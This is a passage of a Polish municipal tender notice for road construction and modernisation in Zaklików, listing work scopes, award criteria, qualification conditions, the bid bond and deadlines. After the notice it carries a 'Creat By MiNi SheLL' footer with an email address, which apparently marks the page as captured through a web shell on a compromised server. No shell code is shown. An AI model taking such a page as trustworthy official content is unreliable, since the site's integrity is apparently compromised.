równinnym<br/>b) elementy odwodnienia: montaż rur osłonowych dwudzielnych, montaż studni SKR-1 – studnia dwuelementowa przelotowa z wbudowaną ramą stalową wraz z pokrywą na istniejącej sieci tp, <br/>c) podbudowa jezdni: mechaniczne wykonanie koryta na całej szerokości jezdni wraz z profilowaniem i zagęszczeniem podłoża pod warstwy konstrukcyjne nawierzchni, wykonanie podbudowy z kruszywa łamanego,<br/>d) nawierzchnie i elementy ulic: wykonanie warstwy wiążącej i warstwy ścieralnej z masy minieralno – asfaltowo grysowej, wykonanie umocnienia pobocza z kruszywa łamanego<br/>e) inne: ustawienie słupków z rur stalowych dla znaków drogowych, przymocowanie do gotowych słupków znaków i tabliczek, oznakowanie poziome jezdni materiałami cienkowarstwowymi linie i symbole, inwentaryzacja powykonawcza.<br/>2.8. Zadanie nr 8 - Modernizacja i remont drogi gminnej w m-ci Józefów<br/>a)	roboty przygotowawcze: odtworzenie trasy i punktów wysokościowych przy liniowych robotach ziemnych, usunięcie ziemi urodzajnej wraz zagospodarowaniem nadmiaru humusu na miejscu,<br/>b) podbudowa jezdni: mechaniczne wykonanie koryta na całej szerokości jezdni wraz z profilowaniem i zagęszczeniem podłoża pod warstwy konstrukcyjne nawierzchni, wykonanie podbudowy z kruszywa łamanego,<br/>d) nawierzchnie i elementy ulic: wykonanie warstwy wiążącej i warstwy ścieralnej z masy minieralno – asfaltowo grysowej, wykonanie umocnienia pobocza z kruszywa łamanego<br/>e) inne: ustawienie słupków z rur stalowych dla znaków drogowych, przymocowanie do gotowych słupków znaków i tabliczek, oznakowanie poziome jezdni materiałami cienkowarstwowymi linie i symbole, inwentaryzacja powykonawcza.<br/>2.9. Zadanie nr 9 - Przebudowa drogi dojazdowej do oczyszczalni ścieków na dz. nr ewid. 836 <br/>– ul. Belkowszczyzna w Zaklikowie w zakresie:<br/>a) roboty przygotowawcze i rozbiórkowe: odtworzenie trasy i punktów wysokościowych przy liniowych robotach ziemnych ( drogi ) w terenie równinnym, usunięcie warstwy ziemi urodzajnej( humusu) z zagospodarowaniem nadmiaru humusu w miejscu<br/>b) elementy odwodnienia: odmulenie rowu wraz z plantowaniem skarp<br/>c) podbudowa jezdni: wykonanie koryta na całej szerokości jezdni wraz z profilowaniem i zagęszczeniem podłoża pod warstwy konstrukcyjne, wykonanie podbudowy z kruszywa łamanego<br/>c) nawierzchnie i elementy ulic: wykonanie warstwy wiążącej i warstwy ścieralnej z masy minieralno – asfaltowo grysowej, wykonanie umocnienia pobocza z kruszywa łamanego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45231100-6 - Ogólne roboty budowlane związane z budową rurociągów</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45316213-1 - Instalowanie oznakowania drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">15 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu rękojmi na wykonane roboty budowlane oraz zamontowane urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">26</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zrównanie okresu gwarancji z okresem rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe kierownika budowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">4</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/> 2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/> 1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa warunku w powyższym zakresie.<br/> 2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie określa warunku w powyższym zakresie.<br/> 3) sytuacji ekonomicznej lub finansowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że posiada środki finansowe lub zdolność kredytową, na kwotę minimum 700 000 zł (siedemset tysięcy złotych)<br/> 4) zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że <br/> 1) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie: <br/>- dwa zadania polegające na zrealizowaniu robót budowlanych związanych z budową lub przebudową dróg, obejmujące zakresem minimum: wykonanie nawierzchni drogi z masy mineralno – asfaltowej wraz z elementami odwodnienia (przepusty, rowy) o wartości nie mniejszej 300 000,00 zł brutto każde. <br/>2) Dysponuje następującymi osobami, posiadającymi wymagane uprawnienia, skierowanymi do realizacji zamówienia:<br/>	Kierownikiem budowy - posiadającym uprawnienia budowlane bez ograniczeń (w rozumieniu przepisów aktualnie obowiązującej ustawy Prawo budowlane) do wykonywania samodzielnych funkcji w budownictwie w specjalności drogowej (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów) legitymującym się minimum 3 letnim doświadczeniem zawodowym (3 lata od daty otrzymania uprawnień o wymaganej specjalności) posiadającym doświadczenie w kierowaniu co najmniej 2 robotami budowlanymi związanymi z budową lub przebudową dróg publicznych o nawierzchni asfaltowej. Stosowną informację, zawierającą w szczególności nazwy i lokalizacje zadań, przy realizacji których wskazana osoba pełniła funkcję kierownika budowy lub kierownika robót, a także zakres wykonywanych przez nią czynności w przedmiotowym postępowaniu oraz informację o podstawie do dysponowania tymi osobami należy zawrzeć w załączniku nr 9 do SWZ wykaz osób. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy p.z.p., o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. 2021 poz. 275), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 4 do SWZ;<br/> 2) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy p.z.p., sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty - załącznik nr 5 do SWZ;<br/>2. Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - załącznik nr 9 do SWZ;<br/>3. Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, na kwotę minimum 700 000 zł (siedemset tysięcy złotych) w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 15 000 zł (słownie: piętnaście tysięcy 00/100 złotych); <br/>2. Wadium wnosi się przed upływem terminu składania ofert.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/> 1) pieniądzu;<br/> 2) gwarancjach bankowych;<br/> 3) gwarancjach ubezpieczeniowych;<br/> 4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4. Wadium wnoszone w pieniądzu należy wnieść przelewem na rachunek bankowy Urzędu Miejskiego w Zaklikowie w banku BSZK w Kraśniku o/Zaklików 07 8717 1093 2012 1200 0101 0006 z dopiskiem „Wadium – postępowanie IN.271.2.2022 „Budowa, przebudowa i modernizacja dróg gminnych i wewnętrznych w Gminie Zaklików&#34;.<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>5. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/> 1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie p.z.p. <br/> 2) z jej treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/> 3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/> 4) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert); <br/> 5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/> 6) beneficjentem poręczenia lub gwarancji jest: Gmina Zaklików ul. Zachodnia 15, 37 - 470 Zaklików.<br/> 7) określać, że sądem właściwym do rozstrzygania ewentualnych sporów jest sąd siedziby Zamawiającego.<br/> 8) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 p.z.p.), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/> 6. Oferta Wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 p.z.p. zostanie odrzucona.<br/>7. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 p.z.p. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/> 2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/> 3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia na podstawie postanowień rozdziału VIII ust. 4, dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy - załącznik nr 8 do SWZ.<br/> 4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych we Wzorze Umowy, stanowiącym Załącznik nr 6 do SWZ.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 p.z.p. oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 6 do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-21 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę składa się pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym za pośrednictwem Platformy dostępnej pod adresem https:/zaklikow.ezamawiajacy.pl.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-21 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zadanie realizowane przy dofinansowaniu ze środków pochodzących z Programu Rządowy Fundusz Polski Ład „Program Inwestycji Strategicznych”<br/>2. Zamawiający nie przewiduje komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ.<br/>3.Zamawiający nie wymaga i nie dopuszcza składania ofert wariantowych.<br/>4. a) Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wszędzie tam, gdzie wykonywanie czynności wynikających z SWZ, w tym z opisu przedmiotu zamówienia, niezbędnych do wykonania przedmiotu zamówienia, polega na wykonywaniu pracy w rozumieniu art. 22 § 1 ustawy z dnia 26 czerwca 1974 r Kodeks pracy (Dz. U. z 2020 r. poz. 1320, dalej kp.). Przedmiotowy wymóg dotyczy zwłaszcza osób wykonujących następujące rodzaje czynności: bezpośrednie wykonywanie robót budowlanych w zakresie wszystkich branż przewidzianych w dokumentacji – wszyscy pracownicy fizyczni wykonujący roboty budowlane na budowie, w tym: roboty przygotowawcze, roboty pomiarowe, roboty ziemne, roboty brukarskie, roboty drogowe, roboty instalacyjne, roboty montażowe, obsługa maszyn i urządzeń, i inne za wyjątkiem Kierownika budowy oraz uprawnionego geodety. <br/> b) Wykonawca jest zobowiązany zawrzeć w każdej umowie o podwykonawstwo stosowne zapisy zobowiązujące podwykonawców do zatrudnienia na umowę o pracę wszystkich osób, które wykonują prace w sposób określony w art. 22 § 1 kp.<br/> c) Dokumentowanie zatrudnienia osób wykonujących wskazane w lit a) czynności polegać będzie:<br/> • na etapie składania ofert - Wykonawca składa oświadczenie na formularzu ofertowym,<br/> • na etapie po zawarciu umowy - zgodnie z treścią wzoru umowy, stanowiącego załącznik do SWZ,<br/> • na etapie realizacji umowy - zgodnie z treścią wzoru umowy, stanowiącego załącznik do SWZ,<br/> d) Uprawnienia Zamawiającego odnośnie kontroli spełniania przez Wykonawcę wymagań:<br/> • każdorazowo na żądanie Zamawiającego, w terminie wskazanym przez Zamawiającego nie krótszym niż 5 dni robocze, Wykonawca zobowiązuje się przedłożyć do wglądu poświadczone za zgodność z oryginałem odpowiednio przez Wykonawcę lub Podwykonawcę kopię umów o pracę osób wykonujących w trakcie realizacji zamówienia czynności, o których mowa w lit a). <br/> • nieprzedłożenie przez Wykonawcę kopii umów zawartych przez Wykonawcę z Pracownikami świadczącymi usługi / roboty budowlane w terminie wskazanym przez Zamawiającego będzie traktowane jako niewypełnienie obowiązku zatrudnienia Pracowników świadczących usługi/roboty budowlane na podstawie umowy o pracę.<br/> • za niewypełnienie wymogu zatrudniania Pracowników świadczących usługi na podstawie umowy o pracę w rozumieniu przepisów Kodeksu Pracy, Wykonawca zapłaci Zamawiającemu kary umowne w wysokości określonej w załączonym do SWZ wzorze umowy.<br/> • w przypadku uzasadnionych wątpliwości, co do przestrzegania prawa pracy przez Wykonawcę lub podwykonawcę, Zamawiający może zwrócić się o przeprowadzenie kontroli przez Państwową Inspekcję Pracy<br/> e) Szczegółowe wymagania dotyczące realizacji oraz egzekwowania wymogu zatrudnienia na podstawie stosunku pracy zostały określone we wzorze umowy stanowiącym Załącznik nr 6 do SWZ.<br/>5. Zamawiający nie przewiduje rozliczenia w walutach obcych.<br/>6. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu. Wszelkie koszty związane z przygotowaniem i złożeniem oferty, w tym ewentualnej wizji lokalnej, ponosi Wykonawca.

Creat By MiNi SheLL
Email: jattceo@gmail.com